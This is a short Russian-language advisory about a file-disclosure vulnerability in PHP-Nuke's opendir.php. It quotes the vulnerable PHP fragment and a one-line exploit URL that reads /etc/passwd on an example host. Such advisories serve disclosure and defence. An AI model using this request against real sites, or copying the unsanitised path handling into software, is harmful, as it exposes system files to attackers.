PHP-Nuke — автоматизированная новостная система специально для Интернета и Интранета. Новая уязвимость в PHP-Nuke позволяет загрузить любой «читаемый» файл. (например, /etc/passwd)

Код уязвимости:

(…)
$REQUEST_URI = strip_tags($REQUEST_URI);
$res = explode(«$PHP_SELF?», $REQUEST_URI);
$odp_cat = $res[1];
if (substr($odp_cat,0,1) == «/») $odp_cat = substr($odp_cat,1);
(define $requesturl)
(…)


Эксплоит:
Следующий урл даст доступ к /etc/passwd:
http://www.example.com/opendir.php?requesturl=/etc/passwd



Оставить мнение